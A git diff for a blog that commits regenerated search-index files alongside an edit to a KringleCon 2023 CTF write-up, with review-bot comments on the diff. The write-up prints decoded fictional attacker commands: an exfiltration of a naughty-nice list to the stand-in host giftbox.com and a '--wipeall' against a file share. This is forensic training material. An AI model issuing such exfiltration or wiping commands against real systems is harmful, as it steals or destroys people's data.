diff --git a/pagefind/fragment/en-us_3f5b2db.pf_fragment b/pagefind/fragment/en-us_e38046e.pf_fragment similarity index 94% rename from pagefind/fragment/en-us_3f5b2db.pf_fragment rename to pagefind/fragment/en-us_e38046e.pf_fragment index a099c4ab..b459449e 100644 Binary files a/pagefind/fragment/en-us_3f5b2db.pf_fragment and b/pagefind/fragment/en-us_e38046e.pf_fragment differ diff --git a/pagefind/index/en-us_e5ddd69.pf_index b/pagefind/index/en-us_0adde87.pf_index similarity index 65% rename from pagefind/index/en-us_e5ddd69.pf_index rename to pagefind/index/en-us_0adde87.pf_index index 04d53710..0e9c0998 100644 Binary files a/pagefind/index/en-us_e5ddd69.pf_index and b/pagefind/index/en-us_0adde87.pf_index differ diff --git a/pagefind/index/en-us_2856191.pf_index b/pagefind/index/en-us_2856191.pf_index new file mode 100644 index 00000000..096f000e Binary files /dev/null and b/pagefind/index/en-us_2856191.pf_index differ diff --git a/pagefind/index/en-us_2e1440e.pf_index b/pagefind/index/en-us_2e1440e.pf_index deleted file mode 100644 index 5ba231c1..00000000 Binary files a/pagefind/index/en-us_2e1440e.pf_index and /dev/null differ diff --git a/pagefind/index/en-us_48f05fe.pf_index b/pagefind/index/en-us_48f05fe.pf_index deleted file mode 100644 index 91d1a6e4..00000000 Binary files a/pagefind/index/en-us_48f05fe.pf_index and /dev/null differ diff --git a/pagefind/index/en-us_6bd9e45.pf_index b/pagefind/index/en-us_6bd9e45.pf_index deleted file mode 100644 index 7825f3d9..00000000 Binary files a/pagefind/index/en-us_6bd9e45.pf_index and /dev/null differ diff --git a/pagefind/index/en-us_83d88d5.pf_index b/pagefind/index/en-us_83d88d5.pf_index new file mode 100644 index 00000000..4cb87b72 Binary files /dev/null and b/pagefind/index/en-us_83d88d5.pf_index differ 
diff --git a/pagefind/index/en-us_8c97b77.pf_index b/pagefind/index/en-us_8c97b77.pf_index new file mode 100644 index 00000000..68951097 Binary files /dev/null and b/pagefind/index/en-us_8c97b77.pf_index differ diff --git a/pagefind/index/en-us_982e17a.pf_index b/pagefind/index/en-us_982e17a.pf_index new file mode 100644 index 00000000..83e8d440 Binary files /dev/null and b/pagefind/index/en-us_982e17a.pf_index differ diff --git a/pagefind/index/en-us_ba6833d.pf_index b/pagefind/index/en-us_ba6833d.pf_index deleted file mode 100644 index 9d772c94..00000000 Binary files a/pagefind/index/en-us_ba6833d.pf_index and /dev/null differ diff --git a/pagefind/index/en-us_c41d634.pf_index b/pagefind/index/en-us_c41d634.pf_index deleted file mode 100644 index 84a81f3d..00000000 Binary files a/pagefind/index/en-us_c41d634.pf_index and /dev/null differ diff --git a/pagefind/index/en-us_d8bd351.pf_index b/pagefind/index/en-us_d8bd351.pf_index new file mode 100644 index 00000000..0a45204c Binary files /dev/null and b/pagefind/index/en-us_d8bd351.pf_index differ diff --git a/pagefind/pagefind-entry.json b/pagefind/pagefind-entry.json index ff04895a..97963975 100644 --- a/pagefind/pagefind-entry.json +++ b/pagefind/pagefind-entry.json @@ -1 +1 @@ -{"version":"1.0.3","languages":{"en-us":{"hash":"en-us_84d7c28ab35c2","wasm":"en-us","page_count":59}}} \ No newline at end of file +{"version":"1.0.3","languages":{"en-us":{"hash":"en-us_cba0324d8ddbf","wasm":"en-us","page_count":59}}} \ No newline at end of file diff --git a/pagefind/pagefind.en-us_84d7c28ab35c2.pf_meta b/pagefind/pagefind.en-us_84d7c28ab35c2.pf_meta deleted file mode 100644 index 9049e688..00000000 Binary files a/pagefind/pagefind.en-us_84d7c28ab35c2.pf_meta and /dev/null differ diff --git a/pagefind/pagefind.en-us_cba0324d8ddbf.pf_meta b/pagefind/pagefind.en-us_cba0324d8ddbf.pf_meta new file mode 100644 index 00000000..c287fac5 Binary files /dev/null and b/pagefind/pagefind.en-us_cba0324d8ddbf.pf_meta differ 
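Review bot: the regenerated pagefind search index (renamed fragment and index files, several deleted and newly added `.pf_index` files, the `pf_meta` swap, and the `pagefind-entry.json` hash change from `en-us_84d7c28ab35c2` to `en-us_cba0324d8ddbf`) is committed together with the content fix, so most of this commit is opaque binary churn that cannot be reviewed. Consider generating the pagefind output in the site build step rather than checking it in, so content diffs stay reviewable; if it must be committed, keep it in a separate commit from the post edit.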
diff --git a/post/kringlecon-2023-writeup/index.html b/post/kringlecon-2023-writeup/index.html index c9fb3973..d9c1d869 100644 --- a/post/kringlecon-2023-writeup/index.html +++ b/post/kringlecon-2023-writeup/index.html @@ -1094,10 +1094,10 @@ these are then rearranged in reverse and the trailing -join '' join print(''.join(map(chr, encoded)))

This yields the following decoded version of the command:

downwithsanta.exe -exfil C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file
 

Here we notice the attacker using an executable called downwithsanta.exe with the -exfil flag to probably exfiltrate the NaughtyNiceList.docx to giftbox.com.

Answer: giftbox.com

The final step!

Wow! You decoded those secret messages with easy! You’re a rockstar. It seems like we’re getting near the end of this investigation, but we need your help with one more thing…

We know that the attackers stole Santa’s naughty or nice list. What else happened? Can you find the final malicious command the attacker ran?

  1. What is the name of the executable the attackers used in the final malicious command?

Let’s decode the final powershell encoded command. As an aside, this coincides to be the last command the attacker ran if we removed the -enc filter.

evidence that it was the last command

echo QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ= | base64 -d
-

This decodes to the following powershell command:

C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$
+

This decodes to the following powershell command:

C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$
 

This shows the attacker running the downwithsanta.exe executable.

Answer: downwithsanta.exe

  1. What was the command line flag used alongside this executable?

In the previous decoded command we also noted that the attacker used the --wipeall with the executable.

Answer: --wipeall

The flag

After submitting all the answers, we are asked to complete our objective in HHC by submitting the output of the following command:

print base64_decode_tostring('QmV3YXJlIHRoZSBDdWJlIHRoYXQgV29tYmxlcw==')
-

This decodes to Beware the Cube that Wombles. We submit this in our objectives tab and mark this complete.

Film Noir Island: The Blacklight District

Phish Detection

Intro to the phish detection challenge

Attention, Digital Defenders! You’ve entered the realm of the Phishing Detection Agency, where advanced AI meets human insight. It’s been reported that AI has started hallucinating, and it’s up to you to discern the reality behind these emails.

Key: In the shadow-laden corridors of our menu, the Phishing link casts a crimson hue, a siren’s call warning that the number of deceitful emails is amiss. Should our digital sleuthing align perfectly with the cunning of these tricksters, watch as it transforms, glowing an emerald green in triumphant success.

Collaboration with ChatNPT: In our ongoing battle against phishing, we’ve enlisted ChatNPT to preliminarily flag potential phishing attempts. These flagged emails are stored in the Phishing Folder. However, AI isn’t foolproof! It’s up to you, the astute investigator, to dive into these emails and confirm their legitimacy. Cross-reference with our DNS records, apply your knowledge of SPF, DKIM, and DMARC, and ensure that only true phishing threats remain in the Phishing Folder. Your keen eye for detail is crucial in outsmarting these digital tricksters!

Your mission: Navigate through our virtual vault of emails, employ your knowledge of SPF, DKIM, and DMARC, and identify those deceptive, phishing attempts.

Welcome to the Geese Islands Email Security Overview. This page serves as a guide to understanding the key components of email authentication and security for our domain. Below, you will find detailed information about our SPF, DKIM, and DMARC records – the three pillars that fortify our email communications against phishing and spoofing attacks. Each section provides insights into what these records are, their importance in maintaining email integrity, and how they are configured for the utmost security of our digital correspondence.

DomainTypeValue
geeseislands.comTXTv=spf1 a:mail.geeseislands.com -all
DomainTypeValue
geeseislands.comTXTv=DKIM1;t=s;p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDjtqsLqwecFGF7AmP+Siln86O1v9NOKJw4ZsEHDV5fo0Vjj0qNPyyARKSkDmnIKjnzLGUUQO31Fr+vdZU61IaI9/ZD39WJKaAeX96uQ65mRQqqPVYxPLN5OvuFRmIHJ/TgOkD6z5/7VM7Zs1kw5Qnl04FmOLwWd00D+uNZnj8TCwIDAQAB
DomainTypeValue
geeseislands.comTXTv=DMARC1; p=reject; pct=100; rua=mailto:dmarc-reports@geeseislands.com

For any of the emails having the DKIM domain (d) parameter mail.geeseislands.com, DMARC as Pass and optionally SPF as pass, -we mark them safe. If the values differ or the domain is entirely different, we mark it as phishing.

These were all the challenges that I could solve before other matters took precedence. I hope you learned something or at the very least, were amused by my less elegant way of solving things.

Bye now.
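Review bot: the removed and added lines in the middle of this hunk (`This decodes to the following powershell command:` followed by `C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$`) read identically in the rendered text, so the purpose of the change is not evident from the diff; if it is a whitespace or markup-only fix, say so in the commit message. Two things a reader will notice in the same hunk are unchanged by the `+` lines: the UNC path renders with doubled backslashes (`\\\\NorthPolefileshare\\c$`, and likewise `C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file` earlier in the hunk), which looks like an escaping artifact in the page source rather than the command line as decoded, and the exfiltrated file is `NaughtNiceList.docx` in the decoded command but `NaughtyNiceList.docx` in the sentence that explains it. If either of those was the intended fix, the added lines do not yet apply it.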